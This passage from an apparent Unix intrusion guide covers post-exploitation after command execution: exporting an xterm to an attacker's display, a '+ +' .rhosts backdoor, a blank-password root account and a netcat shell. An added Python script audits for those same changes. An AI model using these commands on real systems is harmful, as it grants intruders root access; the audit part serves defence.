If you have found some way to execute a command on a Unix box, but there's
no port 23 open - don't despair - you could try to export an xterm to your
box (assuming that you are running an X-server, and you do not block
incoming traffic on port 6000).
> xhost +victim
> your_exploit victim "/usr/X11R6/bin/xterm -display attacker:0.0&"
The above-mentioned command will export an xterm to your server (provided
that xterm is located in /usr/X11R6/bin).
Say you want to rlogin to the host, and want to modify the relevant files to
be able to rlogin to the host:
> your_exploit victim "echo + + >> /.rhosts"
> rlogin -l root victim
The possibilities are endless. You might want to add a UID 0, GID 0 user to
the password file, with a blank password, then telnet and become root. Once
you can execute a command on a UNIX host there should be no reason not to be
able to compromise the host.
We are assuming that the command is executed with "root" rights. If this is
not the case, things can get slightly more difficult. Keep in mind that
normal users cannot have processes that listen on ports lower than 1024. If
you plan to get a shell-spawning netcat, make sure it listens on a port
higher than 1024.
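A defender can check a host for the two changes described above: the "+ +" wildcard in .rhosts and an extra UID 0 or blank-password account in the password file. The following Python check is an added example, not part of the original text; the function names and the sample file contents are constructed for illustration.

```python
"""Added example: audit for the .rhosts and password-file changes described above."""

# Constructed sample file contents (not taken from any real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor::0:0::/:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/sh
"""
SAMPLE_RHOSTS = """\
# trusted hosts
build01 alice
+ +
"""


def audit_passwd(text):
    """Return (user, reason) pairs for extra UID 0 accounts and blank passwords."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            findings.append((line, "malformed entry"))
            continue
        user, passwd, uid = fields[0], fields[1], fields[2]
        if uid.isdigit() and int(uid) == 0 and user != "root":
            findings.append((user, "non-root account with UID 0"))
        if passwd == "":
            findings.append((user, "blank password field"))
    return findings


def audit_rhosts(text):
    """Return entries whose host or user field is the '+' wildcard."""
    findings = []
    for line in text.splitlines():
        entry = line.split("#", 1)[0].split()
        if entry and "+" in entry[:2]:
            findings.append(line.strip())
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("passwd:", finding)
    for line in audit_rhosts(SAMPLE_RHOSTS):
        print("rhosts:", line)
```

On a real host the same functions can be fed the contents of /etc/passwd and of each .rhosts file, including /.rhosts for root.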